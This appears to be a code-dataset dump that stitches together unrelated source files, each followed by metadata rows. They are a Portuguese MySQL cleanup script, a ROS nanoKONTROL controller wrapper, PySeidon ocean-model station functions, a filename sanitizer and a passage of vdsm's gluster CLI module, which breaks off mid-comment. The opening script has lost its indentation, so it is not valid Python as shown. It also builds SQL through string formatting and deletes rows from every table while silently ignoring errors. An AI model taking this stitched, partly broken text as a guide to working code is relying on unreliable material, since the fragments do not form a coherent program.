excluidos = [str(val) for sublist in excluidos for val in sublist]
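    # e.g. fetchall() returning ((10,), (12,)) becomes ['10', '12']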
return excluidos
def remove_tabelas(cursor, tabela_principal, pk, query_dependentes=None):
QUERY = SELECT_EXCLUIDOS % (pk, tabela_principal, pk)
ids_excluidos = get_ids_excluidos(cursor, QUERY)
print("\nRegistros da tabela '%s' com ind_excluido = 1: %s" %
(tabela_principal.upper(), len(ids_excluidos)))
"""
    Remove records from tables that depend on the main table and that
    still have ind_excluido = 0 (not excluded), if such records exist.
"""
if ids_excluidos:
print("Dependencias inconsistentes")
for tabela in mapa[tabela_principal]:
QUERY_DEP = REGISTROS_INCONSISTENTES % (
tabela, pk, ','.join(ids_excluidos))
            # Handle the specific case of norma_juridica
if query_dependentes:
QUERY_DEP = query_dependentes % (','.join(ids_excluidos),
','.join(ids_excluidos))
print(tabela.upper(), cursor.execute(QUERY_DEP))
"""
    Remove all records with ind_excluido = 1 from the dependent tables
    and from the main table, in that order.
"""
print("\n\nRegistros com ind_excluido = 1")
for tabela in mapa[tabela_principal] + [tabela_principal]:
QUERY = EXCLUI_REGISTRO % tabela
print(tabela.upper(), cursor.execute(QUERY))
def remove_excluidas(cursor):
cursor.execute("SHOW_TABLES")
for row in cursor.fetchall():
print(row)
def remove_proposicao_invalida(cursor):
return cursor.execute(
"DELETE FROM proposicao WHERE cod_mat_ou_doc is null")
def remove_materia_assunto_invalida(cursor):
return cursor.execute(
"DELETE FROM materia_assunto WHERE cod_assunto = 0")
def shotgun_remove(cursor):
for tabela in get_ids_excluidos(cursor, "SHOW TABLES"):
try:
cursor.execute("DELETE FROM %s WHERE ind_excluido = 1" % tabela)
except:
pass
if __name__ == '__main__':
connection = pymysql.connect(host=HOST,
user=USER,
password=PASSWORD,
db=DB)
cursor = connection.cursor()
# TIPO AUTOR
remove_tabelas(cursor, 'tipo_autor', 'tip_autor')
# MATERIA LEGISLATIVA
remove_tabelas(cursor, 'materia_legislativa', 'cod_materia')
# NORMA JURIDICA
remove_tabelas(cursor, 'norma_juridica', 'cod_norma', NORMA_DEP)
# COMISSAO
remove_tabelas(cursor, 'comissao', 'cod_comissao')
# SESSAO LEGISLATIVA
remove_tabelas(cursor, 'sessao_legislativa', 'cod_sessao_leg')
# EXPEDIENTE SESSAO
remove_tabelas(cursor, 'tipo_expediente', 'cod_expediente')
# AUTOR
remove_tabelas(cursor, 'autor', 'cod_autor')
# PARLAMENTAR
remove_tabelas(cursor, 'parlamentar', 'cod_parlamentar')
# PROPOSICAO
remove_proposicao_invalida(cursor)
# MATERIA_ASSUNTO
remove_materia_assunto_invalida(cursor)
# shotgun_remove(cursor)
cursor.close()
| gpl-3.0 | -3,535,301,259,724,776,000 | 32.866667 | 86 | 0.610039 | false | 3.00414 | false | false | false |
CentralLabFacilities/m3meka | python/m3/nanokontrol.py | 2 | 2897 | # -*- coding: utf-8 -*-
#M3 -- Meka Robotics Robot Components
#Copyright (c) 2010 Meka Robotics
#Author: [email protected] (Aaron Edsinger)
#M3 is free software: you can redistribute it and/or modify
#it under the terms of the GNU Lesser General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#M3 is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Lesser General Public License for more details.
#You should have received a copy of the GNU Lesser General Public License
#along with M3. If not, see <http://www.gnu.org/licenses/>.
#import roslib; roslib.load_manifest('kontrol')
#from kontrol.msg import Kontrol
import time
import rospy
from threading import Thread
from sensor_msgs.msg import Joy
import os
import subprocess
class M3KontrolThread(Thread):
def __init__(self,verbose=True):
Thread.__init__(self)
self.korg = subprocess.Popen(['rosrun', 'korg_nanokontrol', 'kontrol.py','3'])
self.sliders = [0]*9
self.knobs = [0]*9
self.buttons = [0]*18
self.verbose=verbose
def start(self):
if self.verbose:
print 'Starting M3KontrolThread...'
rospy.init_node('korg_nanokontrol',anonymous=True,disable_signals=True) #allow Ctrl-C to master process
rospy.Subscriber("/joy",Joy,self.callback)
Thread.start(self)
def stop(self):
os.system("pkill -P " + str(self.korg.pid))
os.kill(self.korg.pid,9)
rospy.signal_shutdown('Exiting')
def run(self):
rospy.spin()
def callback(self,data):
if self.verbose:
print data
self.sliders = data.axes[:len(self.sliders)]
self.knobs = data.axes[len(self.sliders):len(self.sliders)+len(self.knobs)]
self.buttons = data.buttons
if self.verbose:
print self.sliders
print self.knobs
print self.buttons
class M3Kontrol:
def __init__(self,verbose=False):
self.kontrol_thread = M3KontrolThread(verbose)
self.kontrol_thread.start()
def get_slider(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.sliders):
return self.kontrol_thread.sliders[idx]
else:
return 0
def get_knob(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.knobs):
return self.kontrol_thread.knobs[idx]
else:
return 0
def get_button(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.buttons):
return self.kontrol_thread.buttons[idx]
else:
return 0
def stop(self):
self.kontrol_thread.stop()
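# Usage sketch (assumes a running roscore, the korg_nanokontrol package and a
# connected nanoKONTROL device):
#   kontrol = M3Kontrol()
#   print kontrol.get_slider(0), kontrol.get_knob(0), kontrol.get_button(0)
#   kontrol.stop()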
| mit | 736,258,013,835,585,500 | 30.846154 | 111 | 0.63514 | false | 3.532927 | false | false | false |
TheKingInYellow/PySeidon | pyseidon/stationClass/functionsStationThreeD.py | 2 | 10617 | #!/usr/bin/python2.7
# encoding: utf-8
from __future__ import division
import numpy as np
import numexpr as ne
from pyseidon.utilities.miscellaneous import *
from pyseidon.utilities.BP_tools import *
import time
# Custom error
from pyseidon_error import PyseidonError
class FunctionsStationThreeD:
"""
**'Utils3D' subset of Station class gathers useful functions for 3D runs**
"""
def __init__(self, variable, grid, plot, History, debug):
#Inheritance
self._debug = debug
self._plot = plot
#Create pointer to FVCOM class
setattr(self, '_var', variable)
setattr(self, '_grid', grid)
setattr(self, '_History', History)
def search_index(self, station):
"""Search for the station index"""
if type(station)==int:
index = station
elif type(station).__name__ in ['str', 'ndarray']:
station = "".join(station).strip().upper()
for i in range(self._grid.nele):
if station=="".join(self._grid.name[i]).strip().upper():
index=i
else:
raise PyseidonError("---Wrong station input---")
if not 'index' in locals():
raise PyseidonError("---Wrong station input---")
return index
def depth(self, station, debug=False):
"""
Compute depth at given point
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- dep = depth, 2D array (ntime, nlevel)
Notes:
- depth convention: 0 = free surface
- index is used in case one knows already at which
element depth is requested
"""
debug = debug or self._debug
if debug:
print "Computing depth..."
start = time.time()
#Search for the station
index = self.search_index(station)
#Compute depth
h = self._grid.h[index]
el = self._var.el[:,index]
zeta = el + h
siglay = self._grid.siglay[:,index]
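        # sigma-coordinate depth: siglay holds fractional levels (0 at the surface,
        # -1 at the bottom), so scaling the local water column (el + h) by siglay
        # gives each level's depth below the free surface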
dep = zeta[:, np.newaxis]*siglay[np.newaxis, :]
if debug:
end = time.time()
print "Computation time in (s): ", (end - start)
return np.squeeze(dep)
def verti_shear(self, station, t_start=[], t_end=[], time_ind=[],
bot_lvl=[], top_lvl=[], graph=True, debug=False):
"""
Compute vertical shear at any given location
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- dveldz = vertical shear (1/s), 2D array (time, nlevel - 1)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- bot_lvl = index of the bottom level to consider, integer
- top_lvl = index of the top level to consider, integer
- graph = plots graph if True
*Notes*
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing vertical shear at point...'
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Search for the station
index = self.search_index(station)
#Compute depth
dep = self.depth(station, debug=debug)
if not argtime==[]:
depth = dep[argtime,:]
else:
depth = dep
#Sigma levels to consider
if top_lvl==[]:
top_lvl = self._grid.nlevel - 1
if bot_lvl==[]:
bot_lvl = 0
sLvl = range(bot_lvl, top_lvl+1)
#Extracting velocity at point
if not argtime==[]:
U = self._var.u[argtime,:,index]
V = self._var.v[argtime,:,index]
else:
U = self._var.u[:,:,index]
V = self._var.v[:,:,index]
norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
# Compute shear
dz = depth[:,sLvl[1:]] - depth[:,sLvl[:-1]]
dvel = norm[:,sLvl[1:]] - norm[:,sLvl[:-1]]
dveldz = dvel / dz
if debug:
print '...Passed'
#Plot mean values
if graph:
mean_depth = np.mean((depth[:,sLvl[1:]]
+ depth[:,sLvl[:-1]]) / 2.0, 0)
mean_dveldz = np.mean(dveldz,0)
error = np.std(dveldz,axis=0)
self._plot.plot_xy(mean_dveldz, mean_depth, xerror=error[:],
title='Shear profile ',
xLabel='Shear (1/s) ', yLabel='Depth (m) ')
return np.squeeze(dveldz)
def velo_norm(self, station, t_start=[], t_end=[], time_ind=[],
graph=True, debug=False):
"""
Compute the velocity norm at any given location
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- velo_norm = velocity norm, 2D array (time, level)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- graph = plots vertical profile averaged over time if True
*Notes*
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing velocity norm at point...'
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Search for the station
index = self.search_index(station)
#Computing velocity norm
try:
if not argtime==[]:
U = self._var.u[argtime, :, index]
V = self._var.v[argtime, :, index]
W = self._var.w[argtime, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
else:
U = self._var.u[:, :, index]
V = self._var.v[:, :, index]
W = self._var.w[:, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
except AttributeError:
if not argtime==[]:
U = self._var.u[argtime, :, index]
V = self._var.v[argtime, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
else:
U = self._var.u[:, :, index]
V = self._var.v[:, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
if debug:
print '...passed'
#Plot mean values
if graph:
depth = np.mean(self.depth(station),axis=0)
vel = np.mean(velo_norm,axis=0)
error = np.std(velo_norm,axis=0)
self._plot.plot_xy(vel, depth, xerror=error[:],
title='Velocity norm profile ',
xLabel='Velocity (m/s) ', yLabel='Depth (m) ')
return velo_norm
def flow_dir(self, station, t_start=[], t_end=[], time_ind=[],
vertical=True, debug=False):
"""
Compute flow directions and associated norm at any given location.
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- flowDir = flowDir at (pt_lon, pt_lat), 2D array (ntime, nlevel)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- vertical = True, compute flowDir for each vertical level
*Notes*
- directions between -180 and 180 deg., i.e. 0=East, 90=North,
+/-180=West, -90=South
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing flow directions at point...'
#Search for the station
index = self.search_index(station)
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Choose the right pair of velocity components
        if not argtime==[]:
            if self._var._3D and vertical:
                u = self._var.u[argtime,:,index]
                v = self._var.v[argtime,:,index]
            else:
                u = self._var.ua[argtime,index]
                v = self._var.va[argtime,index]
        else:
            # no time subset requested: use the full time series
            if self._var._3D and vertical:
                u = self._var.u[:,:,index]
                v = self._var.v[:,:,index]
            else:
                u = self._var.ua[:,index]
                v = self._var.va[:,index]
#Compute directions
if debug: print 'Computing arctan2 and norm...'
dirFlow = np.rad2deg(np.arctan2(v,u))
if debug:
print '...Passed'
return np.squeeze(dirFlow)
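    # Usage sketch (hypothetical station object; this class is exposed as the Utils3D
    # attribute of a Station instance, per the class docstring):
    #   norm = station.Utils3D.velo_norm('StationName', graph=False)
    #   shear = station.Utils3D.verti_shear(0, graph=False)
    #   direction = station.Utils3D.flow_dir(0)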
#TR_comments: templates
# def whatever(self, debug=False):
# if debug or self._debug:
# print 'Start whatever...'
#
# if debug or self._debug:
# print '...Passed'
| agpl-3.0 | -3,323,359,679,726,499,300 | 33.470779 | 96 | 0.509466 | false | 3.817691 | false | false | false |
ksze/sanitize | filename_sanitizer/__init__.py | 1 | 10364 | from __future__ import unicode_literals
import sys
import unicodedata
import warnings
class ReplacementLengthWarning(UserWarning):
pass
warnings.filterwarnings("always", category=ReplacementLengthWarning)
def _are_unicode(unicode_args=[]):
if sys.version_info[0] == 2:
return all((type(arg) == unicode) for arg in unicode_args)
# Assume Python 3
return all((type(arg) == str) for arg in unicode_args)
def sanitize_path_fragment(
original_fragment,
filename_extension = '', # when you do want a filename extension, there is no need to include the leading dot.
target_file_systems = {
'btrfs', 'ext', 'ext2', 'ext3', 'ext3cow', 'ext4', 'exfat', 'fat32',
'hfs+', 'ntfs_win32', 'reiser4', 'reiserfs', 'xfs', 'zfs',
},
sanitization_method = 'underscore',
truncate = True,
replacement = '_',
additional_illegal_characters=[],
):
# Enforce that these args are unicode strings
unicode_args = [original_fragment, filename_extension, replacement] + additional_illegal_characters
if not _are_unicode(unicode_args):
raise ValueError(
'`original_fragment`, `filename_extension`, `replacement`, and `additional_illegal_characters` '
'must be of the unicode type under Python 2 or str type under Python 3.'
)
if len(replacement) > 1:
warnings.warn(
"The replacement is longer than one character. "
"The length of the resulting string cannot be guaranteed to fit the target file systems' length limit.",
ReplacementLengthWarning
)
sanitized_fragment = unicodedata.normalize('NFC', original_fragment)
if len(filename_extension) > 0:
filename_extension = unicodedata.normalize('NFC', '.' + filename_extension)
if sanitization_method == 'underscore':
illegal_characters = {
'btrfs': {'\0', '/'},
'ext': {'\0', '/'},
'ext2': {'\0', '/'},
'ext3': {'\0', '/'},
'ext3cow': {'\0', '/', '@'},
'ext4': {'\0', '/'},
'exfat': {
'\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
'\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
'/', '\\', ':', '*', '?', '"', '<', '>', '|',
},
'fat32': { # TODO: Confirm this list; current list is just a wild guess, assuming UTF-16 encoding.
'\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
'\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
'/', '\\', ':', '*', '?', '"', '<', '>', '|',
},
# In theory, all Unicode characters, including NUL, are usable in HFS+; so this is just
# a sane set for legacy compatibility - e.g. OS APIs that don't support '/' and ':'.
'hfs+': {'\0', '/', ':'},
'ntfs_win32': {'\0', '/', '\\', ':', '*', '?', '"', '<', '>', '|'}, # NTFS Win32 namespace (stricter)
'ntfs_posix': {'\0', '/'}, # NTFS POSIX namespace (looser)
'reiser4': {'\0', '/'},
'reiserfs': {'\0', '/'},
'xfs': {'\0', '/'},
'zfs': {'\0', '/'},
'additional_illegal_characters': set(additional_illegal_characters),
}
# Replace illegal characters with an underscore
# `target_file_systems` is used further down, so we don't want to pollute it here.
_temp_target_file_systems = set.union(target_file_systems, {'additional_illegal_characters'})
illegal_character_set = set.union(*(illegal_characters[file_system] for file_system in _temp_target_file_systems))
# It would be stupid if the replacement contains an illegal character.
if any(character in replacement for character in illegal_character_set):
raise ValueError('The replacement contains a character that would be illegal in the target file system(s).')
for character in illegal_character_set:
sanitized_fragment = sanitized_fragment.replace(character, replacement)
filename_extension = filename_extension.replace(character, replacement)
# "Quote" illegal filenames
if target_file_systems.intersection({'fat32', 'ntfs_win32'}):
windows_reserved_names = (
"CON", "PRN", "AUX", "NUL",
"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
)
if sanitized_fragment in windows_reserved_names:
sanitized_fragment = replacement + sanitized_fragment + replacement
if filename_extension in windows_reserved_names:
filename_extension = replacement + filename_extension + replacement
# Truncate if the resulting string is too long
if truncate:
max_lengths = {
# For the entries of file systems commonly found with Linux, the length, 'utf-8',
# and 'NFC' are only assumptions that apply to mostly vanilla kernels with default
# build parameters.
# Seriously, this is 2013. The fact that the Linux community does not move to a file
# system with an enforced Unicode filename encoding is as bad as Windows 95's
# codepage madness, some 18 years ago.
# If you add more file systems, see if it is affected by Unicode Normal Forms, like
# HFS+; You may have to take extra care in editing the actual sanitization routine
# below.
'btrfs': (255, 'bytes', 'utf-8', 'NFC'),
'ext': (255, 'bytes', 'utf-8', 'NFC'),
'ext2': (255, 'bytes', 'utf-8', 'NFC'),
'ext3': (255, 'bytes', 'utf-8', 'NFC'),
'ext3cow': (255, 'bytes', 'utf-8', 'NFC'),
'ext4': (255, 'bytes', 'utf-8', 'NFC'),
'exfat': (255, 'characters', 'utf-16', 'NFC'),
# 'utf-16' is not entirely true. FAT32 used to be used with codepages; but since
# Windows XP, the default seems to be UTF-16.
'fat32': (255, 'characters', 'utf-16', 'NFC'),
# FIXME: improve HFS+ handling, because it does not use the standard NFD. It's
# close, but it's not exactly the same thing.
'hfs+': (255, 'characters', 'utf-16', 'NFD'),
'ntfs_win32': (255, 'characters', 'utf-16', 'NFC'),
'ntfs_posix': (255, 'characters', 'utf-16', 'NFC'),
# ReiserFS 3 and 4 support filenames > 255 bytes. I don't care if the vanilla Linux
# kernel can't support that. That's Linux's problem, not mine.
'reiser4': (3976, 'bytes', 'utf-8', 'NFC'),
'reiserfs': (4032, 'bytes', 'utf-8', 'NFC'),
'xfs': (255, 'bytes', 'utf-8', 'NFC'),
'zfs': (255, 'bytes', 'utf-8', 'NFC'),
}
for file_system in target_file_systems:
if max_lengths[file_system][1] == 'bytes':
extension_bytes = unicodedata.normalize(max_lengths[file_system][3], filename_extension).encode(max_lengths[file_system][2])
temp_fragment = bytearray()
for character in sanitized_fragment:
encoded_bytes = unicodedata.normalize(max_lengths[file_system][3], character).encode(max_lengths[file_system][2])
if len(temp_fragment) + len(encoded_bytes) + len(extension_bytes)<= max_lengths[file_system][0]:
temp_fragment = temp_fragment + encoded_bytes
else:
break
sanitized_fragment = unicodedata.normalize('NFC', temp_fragment.decode(max_lengths[file_system][2]))
else: # Assume 'characters'
temp_fragment = ''
if file_system == 'hfs+':
normalize = unicodedata.ucd_3_2_0.normalize
else:
normalize = unicodedata.normalize
normalized_extension = normalize(max_lengths[file_system][3], filename_extension)
for character in sanitized_fragment:
normalized_character = normalize(max_lengths[file_system][3], character)
if len(temp_fragment) + len(normalized_character) + len(normalized_extension) <= max_lengths[file_system][0]:
temp_fragment += normalized_character
else:
break
sanitized_fragment = unicodedata.normalize('NFC', temp_fragment)
sanitized_fragment = sanitized_fragment + filename_extension
# Disallow a final dot or space for FAT32 and NTFS in Win32 namespace.
# This can only be done after truncations because otherwise we may fix the fragment, but
# still end up with a bad ending character once it's truncated
if (
target_file_systems.intersection({'fat32', 'ntfs_win32'}) and
(sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' '))
):
if replacement.endswith('.') or replacement.endswith(' '):
raise ValueError(
'The sanitized string ends with a dot or space, and the replacement also ends with a dot or space. '
'Therefore the string cannot be sanitized for fat32 or ntfs_win32.'
)
while (sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' ')):
sanitized_fragment = sanitized_fragment[:-1] + replacement
else:
raise ValueError("sanitization_method must be a valid sanitization method.")
return sanitized_fragment
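# Example (a sketch; the exact output depends on the options chosen):
#   sanitize_path_fragment(u'foo:bar?', filename_extension=u'txt',
#                          target_file_systems={'ntfs_win32'})
#   -> u'foo_bar_.txt'   (':' and '?' are illegal in the NTFS Win32 namespace and become '_')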
| bsd-2-clause | 5,655,083,877,428,334,000 | 48.118483 | 144 | 0.531648 | false | 4.135674 | false | false | false |
EdDev/vdsm | lib/vdsm/gluster/cli.py | 1 | 60687 | #
# Copyright 2012-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
from __future__ import absolute_import
import calendar
import logging
import os
import socket
import time
import xml.etree.cElementTree as etree
from vdsm.common import cmdutils
from vdsm import commands
from vdsm.gluster import exception as ge
from vdsm.network.netinfo import addresses
from . import gluster_mgmt_api, gluster_api
_glusterCommandPath = cmdutils.CommandPath("gluster",
"/usr/sbin/gluster",
)
_TIME_ZONE = time.tzname[0]
if hasattr(etree, 'ParseError'):
_etreeExceptions = (etree.ParseError, AttributeError, ValueError)
else:
_etreeExceptions = (SyntaxError, AttributeError, ValueError)
def _getGlusterVolCmd():
return [_glusterCommandPath.cmd, "--mode=script", "volume"]
def _getGlusterPeerCmd():
return [_glusterCommandPath.cmd, "--mode=script", "peer"]
def _getGlusterSystemCmd():
return [_glusterCommandPath.cmd, "system::"]
def _getGlusterVolGeoRepCmd():
return _getGlusterVolCmd() + ["geo-replication"]
def _getGlusterSnapshotCmd():
return [_glusterCommandPath.cmd, "--mode=script", "snapshot"]
class BrickStatus:
PAUSED = 'PAUSED'
COMPLETED = 'COMPLETED'
RUNNING = 'RUNNING'
UNKNOWN = 'UNKNOWN'
NA = 'NA'
class HostStatus:
CONNECTED = 'CONNECTED'
DISCONNECTED = 'DISCONNECTED'
UNKNOWN = 'UNKNOWN'
class VolumeStatus:
ONLINE = 'ONLINE'
OFFLINE = 'OFFLINE'
class TransportType:
TCP = 'TCP'
RDMA = 'RDMA'
class TaskType:
REBALANCE = 'REBALANCE'
REPLACE_BRICK = 'REPLACE_BRICK'
REMOVE_BRICK = 'REMOVE_BRICK'
class SnapshotStatus:
ACTIVATED = 'ACTIVATED'
DEACTIVATED = 'DEACTIVATED'
def _execGluster(cmd):
return commands.execCmd(cmd)
def _execGlusterXml(cmd):
cmd.append('--xml')
rc, out, err = commands.execCmd(cmd)
if rc != 0:
raise ge.GlusterCmdExecFailedException(rc, out, err)
try:
tree = etree.fromstring('\n'.join(out))
rv = int(tree.find('opRet').text)
msg = tree.find('opErrstr').text
errNo = int(tree.find('opErrno').text)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=out)
if rv == 0:
return tree
else:
if errNo != 0:
rv = errNo
raise ge.GlusterCmdFailedException(rc=rv, err=[msg])
def _getLocalIpAddress():
for ip in addresses.getIpAddresses():
if not ip.startswith('127.'):
return ip
return ''
def _getGlusterHostName():
try:
return socket.getfqdn()
except socket.herror:
logging.exception('getfqdn')
return ''
@gluster_mgmt_api
def hostUUIDGet():
command = _getGlusterSystemCmd() + ["uuid", "get"]
rc, out, err = _execGluster(command)
if rc == 0:
for line in out:
if line.startswith('UUID: '):
return line[6:]
raise ge.GlusterHostUUIDNotFoundException()
def _parseVolumeStatus(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': [],
'nfs': [],
'shd': []}
hostname = _getLocalIpAddress() or _getGlusterHostName()
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
ports = {}
for ch in el.find('ports').getchildren():
ports[ch.tag] = ch.text or ''
if value['path'] == 'localhost':
value['path'] = hostname
if value['status'] == '1':
value['status'] = 'ONLINE'
else:
value['status'] = 'OFFLINE'
if value['hostname'] == 'NFS Server':
status['nfs'].append({'hostname': value['path'],
'hostuuid': value['peerid'],
'port': ports['tcp'],
'rdma_port': ports['rdma'],
'status': value['status'],
'pid': value['pid']})
elif value['hostname'] == 'Self-heal Daemon':
status['shd'].append({'hostname': value['path'],
'hostuuid': value['peerid'],
'status': value['status'],
'pid': value['pid']})
else:
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'port': ports['tcp'],
'rdma_port': ports['rdma'],
'status': value['status'],
'pid': value['pid']})
return status
def _parseVolumeStatusDetail(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
sizeTotal = int(value['sizeTotal'])
value['sizeTotal'] = sizeTotal / (1024.0 * 1024.0)
sizeFree = int(value['sizeFree'])
value['sizeFree'] = sizeFree / (1024.0 * 1024.0)
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'sizeTotal': '%.3f' % (value['sizeTotal'],),
'sizeFree': '%.3f' % (value['sizeFree'],),
'device': value['device'],
'blockSize': value['blockSize'],
'mntOptions': value['mntOptions'],
'fsName': value['fsName']})
return status
def _parseVolumeStatusClients(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
hostname = el.find('hostname').text
path = el.find('path').text
hostuuid = el.find('peerid').text
clientsStatus = []
for c in el.findall('clientsStatus/client'):
clientValue = {}
for ch in c.getchildren():
clientValue[ch.tag] = ch.text or ''
clientsStatus.append({'hostname': clientValue['hostname'],
'bytesRead': clientValue['bytesRead'],
'bytesWrite': clientValue['bytesWrite']})
status['bricks'].append({'brick': '%s:%s' % (hostname, path),
'hostuuid': hostuuid,
'clientsStatus': clientsStatus})
return status
def _parseVolumeStatusMem(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
brick = {'brick': '%s:%s' % (el.find('hostname').text,
el.find('path').text),
'hostuuid': el.find('peerid').text,
'mallinfo': {},
'mempool': []}
for ch in el.find('memStatus/mallinfo').getchildren():
brick['mallinfo'][ch.tag] = ch.text or ''
for c in el.findall('memStatus/mempool/pool'):
mempool = {}
for ch in c.getchildren():
mempool[ch.tag] = ch.text or ''
brick['mempool'].append(mempool)
status['bricks'].append(brick)
return status
@gluster_mgmt_api
def volumeStatus(volumeName, brick=None, option=None):
"""
Get volume status
Arguments:
* VolumeName
* brick
* option = 'detail' or 'clients' or 'mem' or None
Returns:
When option=None,
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'port': PORT,
'rdma_port': RDMA_PORT,
'status': STATUS,
'pid': PID}, ...],
'nfs': [{'hostname': HOST,
'hostuuid': UUID,
'port': PORT,
'rdma_port': RDMA_PORT,
'status': STATUS,
'pid': PID}, ...],
'shd: [{'hostname': HOST,
'hostuuid': UUID,
'status': STATUS,
'pid': PID}, ...]}
When option='detail',
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'sizeTotal': SIZE,
'sizeFree': FREESIZE,
'device': DEVICE,
'blockSize': BLOCKSIZE,
'mntOptions': MOUNTOPTIONS,
'fsName': FSTYPE}, ...]}
When option='clients':
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'clientsStatus': [{'hostname': HOST,
'bytesRead': BYTESREAD,
'bytesWrite': BYTESWRITE}, ...]},
...]}
When option='mem':
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'mallinfo': {'arena': int,
'fordblks': int,
'fsmblks': int,
'hblkhd': int,
'hblks': int,
'keepcost': int,
'ordblks': int,
'smblks': int,
'uordblks': int,
'usmblks': int},
'mempool': [{'allocCount': int,
'coldCount': int,
'hotCount': int,
'maxAlloc': int,
'maxStdAlloc': int,
'name': NAME,
'padddedSizeOf': int,
'poolMisses': int},...]}, ...]}
"""
command = _getGlusterVolCmd() + ["status", volumeName]
if brick:
command.append(brick)
if option:
command.append(option)
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeStatusFailedException(rc=e.rc, err=e.err)
try:
if option == 'detail':
return _parseVolumeStatusDetail(xmltree)
elif option == 'clients':
return _parseVolumeStatusClients(xmltree)
elif option == 'mem':
return _parseVolumeStatusMem(xmltree)
else:
return _parseVolumeStatus(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
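# Illustrative sketch (assumed usage, not part of vdsm): one way a caller might
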